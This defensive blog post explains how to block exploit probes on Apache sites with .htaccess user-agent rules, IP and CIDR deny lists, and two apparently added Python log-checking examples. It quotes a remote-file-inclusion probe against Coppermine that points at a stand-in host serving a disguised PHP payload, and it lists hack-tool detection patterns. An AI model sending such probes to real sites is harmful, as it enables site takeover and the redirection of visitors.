Protect your Apache hosted website from Chinese exploit attacks
While reading my raw access logs I noticed that a lot of the recent exploit attacks hitting my website are coming from China and Korea. I can't say with certainty that the attacks originated in those countries, because they could be coming from compromised servers. Do you care whether an attack originated at the server that is attacking yours? Hell no! If some black hat hacker is commandeering a hundred thousand Chinese servers and using them to attack my servers, I block the Chinese IP addresses since they are attacking me.
Here is a typical, recent exploit attempt, coming from a server in China. I have changed the destination URL to example.com for your safety.
218.246.20.221 - - [17/Jul/2009:14:36:29 -0700] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://example.com/gboard/rs/copyright.txt? HTTP/1.1" 403 137 "-" "Mozilla/5.0"
If I was running a vulnerable version of the targeted "Coppermine" software, that upload attempt would have yielded a server 200 Success, instead of a 403 Forbidden response. This would have led to the exploitation of my website and hidden iframes would redirect my visitors to hostile destinations. I won't willingly allow that to happen and neither should other webmasters.
So, you ask, how do I block these Chinese servers from attacking my websites? If your websites are hosted on Apache web servers I can offer you two effective means of blocking those exploit probes. The details follow.
Blocking Chinese servers or personal computers from your websites
Several years ago I began reading the access logs for my websites and learned that hackers were targeting me with various exploit attacks. The goal of all of those attacks is to find an unpatched, vulnerable version of a PHP script that is installed on your website and inject hostile files into it, then use them to write iframe redirection codes to other files in your website. Take a look at this previously listed example:
218.246.20.221 - - [17/Jul/2009:14:36:29 -0700] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://example.com/gboard/rs/copyright.txt? HTTP/1.1" 403 137 "-" "Mozilla/5.0"
First of all, let's run a Whois lookup to see where that IP address is located.
http://whois.domaintools.com/218.246.20.221
IP Location: China China Beijing Development & Research Center Of State Council Net
inetnum: 218.246.0.0 - 218.246.31.255
Next, I Googled on the exploit path: GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR= and found many results defining this attack. Here is but one:
Coppermine Photo Gallery contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is triggered when sending a specially crafted URL request to the theme.php script using the THEME_DIR variable to specify a malicious file from a remote system as a parameter.
The next parameter lists the http destination where a text file is hosted.
http://example.com/gboard/rs/copyright.txt?
That file is really a PHP script in disguise and it is usually hosted unknowingly on somebody's compromised website. Note that some exploit files are actually hosted on hostile servers owned by cyber criminals.
Then we come to the number 403. It signifies that this attempt was Forbidden by my server configuration. I will be showing you how to accomplish the same thing on your server, or website.
Last, the stated user agent is one commonly used by server hacking programs: "Mozilla/5.0". Another common exploit tool is named "libwww-perl/(version numbers)".
Blocking hacking attacks by user agent
The first line of defense is to block access to known hack-tool user agents. The two I have shown in this article are the most frequently used agents, but others are used from time to time. The following codes can be added to your web-root .htaccess file to block access to all files, for these hacker user agents:
Options +FollowSymLinks
RewriteEngine On
RewriteBase /
# A bare "Mozilla/5.0" with nothing after it (real browsers append platform details)
RewriteCond %{HTTP_USER_AGENT} ^Mozilla/5\.0$ [OR]
# Any version of the libwww-perl library
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/
# Matching requests get a 403 Forbidden for every file
RewriteRule .* - [F]
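The log walk-through above and the two user-agent rules can be checked offline before touching a live .htaccess. This added example (mine, not from the article) parses Apache combined-format lines, applies the same two user-agent tests as the RewriteCond lines, and also flags the remote-include pattern (a query parameter whose value is itself a URL) seen in the THEME_DIR= probe; the sample lines other than the article's own are constructed.

```python
import re
from dataclasses import dataclass

# Apache "combined" log format, as in the line quoted in the article.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Same tests as the article's two RewriteCond lines: exactly the bare
# string "Mozilla/5.0", or anything that starts with "libwww-perl/".
HACK_TOOL_UA = re.compile(r'^Mozilla/5\.0$|^libwww-perl/')

# A query-string value that is itself a URL is the signature of a remote
# file inclusion probe like the THEME_DIR= request in the article.
REMOTE_INCLUDE = re.compile(r'[?&][^=&]+=https?://', re.IGNORECASE)

@dataclass
class Hit:
    ip: str
    status: int
    bad_ua: bool
    remote_include: bool

def parse_line(line):
    """Parse one combined-format line; returns None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return Hit(ip=m['ip'], status=int(m['status']),
               bad_ua=bool(HACK_TOOL_UA.search(m['ua'])),
               remote_include=bool(REMOTE_INCLUDE.search(m['path'])))

def suspicious(lines):
    """(ip, status) for each line the UA rules would block or that probes a remote include."""
    out = []
    for line in lines:
        hit = parse_line(line)
        if hit and (hit.bad_ua or hit.remote_include):
            out.append((hit.ip, hit.status))
    return out

# Constructed sample: the article's real log line, a made-up normal browser
# visit, and a made-up libwww-perl probe that the server did not block.
SAMPLE = [
    '218.246.20.221 - - [17/Jul/2009:14:36:29 -0700] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://example.com/gboard/rs/copyright.txt? HTTP/1.1" 403 137 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [17/Jul/2009:14:40:01 -0700] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/3.0"',
    '198.51.100.7 - - [17/Jul/2009:14:41:12 -0700] "GET /index.php?page=http://example.com/x.txt? HTTP/1.0" 200 88 "-" "libwww-perl/5.805"',
]
```

The full-length Firefox user agent is not flagged, which is why the RewriteCond anchors the bare "Mozilla/5.0" with both ^ and $.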
Protecting a dedicated, semi-dedicated, or VPS server from Chinese exploit attacks
Business and reseller hosting accounts are typically hosted on dedicated, or semi-dedicated servers. The lessee is usually expected to manage the leased server themselves, although managed hosting is usually available at a monthly cost. People renting or owning dedicated servers have technicians who manage updates, patches and firewalls.
If you manage your own web server that runs on Linux or Unix, you can apply my frequently updated Chinese iptables blocklist to your server's firewall. There is an up to date blocklist embedded on that page. You can copy and paste the list of IP addresses, in iptables format, into a Linux APF firewall, or a similar firewall. Instructions are found here for installing these firewalls and adding new rules.
If you lease a dedicated server and don't understand how to install and update the firewall ask for technical assistance from your hosting company. They usually provide firewall updates as a service to dedicated and VPS customers, for the protection of all involved.
Protecting individual websites from Chinese exploit attacks
Most private websites are hosted on shared hosting servers, where you are e pluribus unum - one out of many - accounts. You will not have access to the server's firewall, or the Linux operating system. You are only able to control access to your own web pages. You need to apply my Chinese .htaccess blocklist to your public web root .htaccess file.
Experienced webmasters know that server files beginning with a period are normally hidden server configuration files. These files can be made visible by configuring your FTP client with the remote mask code: -al which unhides .htaccess and other hidden server control files in the remote location browser section. Some FTP clients may have a simple checkbox to display these files. Online control panels usually include a website file browser and usually they show files beginning with a period.
Not every website comes with a .htaccess file, so, if you don't see one and hidden files are displayed, you will need to create a new .htaccess file. Or, just copy the contents of my blocklist, between the sections marked as containing the .htaccess rules and paste it into a new plain text file. Save that file as .htaccess and upload it to your website, in the public_html or equivalent directory. Be sure to immediately test your website to ensure that you haven't pasted in an uncommented character by accident, which will result in a Server 500 lockout error. .htaccess comments begin with a # sign. Directives begin with specific characters or words. Be careful when editing your .htaccess file. If you include an uncommented word that is not recognized as a legitimate command, a Server 500 will result and nobody will see your web pages until this is fixed.
Example of a good comment in a .htaccess file:
# This is a legitimate comment in .htaccess
Example of a bad comment in a .htaccess file:
This comment will cause a Server 500 error because it is not preceded by a # symbol.
Using .htaccess Mod-Access to block offending IP addresses
Here is an example of the correct .htaccess terminology to deny access to the offending Chinese address that is listed throughout this article.
<Files *>
deny from 218.246.20.221
</Files>
That blocks just that one server IP address. This doesn't accomplish much when there are several million Chinese and Korean IP addresses that may be used to attack your server. Instead of listing every one of those IP addresses, I use complete ranges assigned to the ISP or hosting company, as I discover them. The format used is called a CIDR, which means Classless Inter-Domain Routing. Below is the CIDR that encompasses the attacker's IP address.
<Files *>
deny from 218.246.0.0/16
</Files>
Using the CIDR 218.246.0.0/16 blocks all IP addresses between 218.246.0.0 and 218.246.255.255. All (four) of my .htaccess blocklists usually list entire CIDRs, although there may be a few individual IPs included here and there. There are dozens to hundreds of CIDRs in my various blocklists. The Chinese blocklist is ever-growing as I discover new CIDRs that have been assigned to servers and ISPs in that area of the World. Many webmasters apply my blocklists to protect their servers and websites from exploiters, hackers, spammers and scammers.
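Turning a Whois inetnum into a CIDR and checking what it covers is easy to get wrong by hand, so here is an added example (mine, not from the article) that works through the article's own numbers: the inetnum 218.246.0.0 - 218.246.31.255 collapses to a single /19, the /16 the article uses spans 218.246.0.0 to 218.246.255.255, and both contain the attacker's address. It also renders the deny block in the same form shown above.

```python
import ipaddress

# Inputs taken from the article: the attacker's address and the inetnum
# range that the Whois lookup reported for it.
ATTACKER = "218.246.20.221"
WHOIS_INETNUM = "218.246.0.0 - 218.246.31.255"

def inetnum_to_cidrs(inetnum):
    """Collapse a Whois 'first - last' range into the fewest CIDR blocks."""
    first, last = (ipaddress.ip_address(p.strip()) for p in inetnum.split("-"))
    return [str(net) for net in ipaddress.summarize_address_range(first, last)]

def cidr_bounds(cidr):
    """First and last address covered by a CIDR, as strings."""
    net = ipaddress.ip_network(cidr, strict=False)
    return str(net.network_address), str(net.broadcast_address)

def covers(cidr, ip):
    """True if the address falls inside the CIDR block."""
    return ipaddress.ip_address(ip) in ipaddress.ip_network(cidr, strict=False)

def htaccess_deny(cidrs):
    """Render deny directives in the same <Files *> form the article uses."""
    body = "\n".join(f"deny from {c}" for c in cidrs)
    return f"<Files *>\n{body}\n</Files>"

if __name__ == "__main__":
    print(inetnum_to_cidrs(WHOIS_INETNUM))   # ['218.246.0.0/19']
    print(cidr_bounds("218.246.0.0/16"))      # ('218.246.0.0', '218.246.255.255')
    print(covers("218.246.0.0/19", ATTACKER), covers("218.246.0.0/16", ATTACKER))
    print(htaccess_deny(["218.246.0.0/16"]))
```

On Apache 2.4 the 2.2-style deny from lines only work with mod_access_compat loaded; the native 2.4 form is a RequireAll block containing Require all granted and Require not ip 218.246.0.0/16.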
Note that only the iptables blocklist will keep the attempted hacks from appearing in the access logs for individual websites. If you only have use of my .htaccess blocklists you will see these attacks, but they should all result in a server 403 response.
If you like this article please share it.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.